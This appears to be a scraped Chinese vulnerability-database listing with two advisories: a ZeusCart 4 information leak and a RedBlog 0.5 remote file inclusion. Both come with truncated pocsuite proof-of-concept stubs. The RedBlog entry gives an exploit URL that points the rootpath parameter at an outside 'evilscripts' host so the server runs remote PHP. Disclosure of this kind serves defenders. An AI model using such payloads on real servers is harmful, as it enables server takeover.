ZeusCart 4 信息泄漏漏洞

No description provided by source. !/usr/bin/env python coding: utf-8 from urlparse import urljoin from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '11111 ' vul ID version = '1' author = 'Disorder' vulDate =...

RedBlog 0.5 Index.PHP Remote File Include Vulnerability

RedBlog 0.5 Index.PHP 远程文件包含漏洞 漏洞类型： 输入验证错误 漏洞危害： 攻击者可以利用该漏洞执行远程php文件，从而攻击RedBlog甚至控制 服务器 exp： http://www.example.com/Path/index.php?rootpath==http://evilscripts? 解决方案： 厂商没有提供补丁，推荐使用加速乐: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from...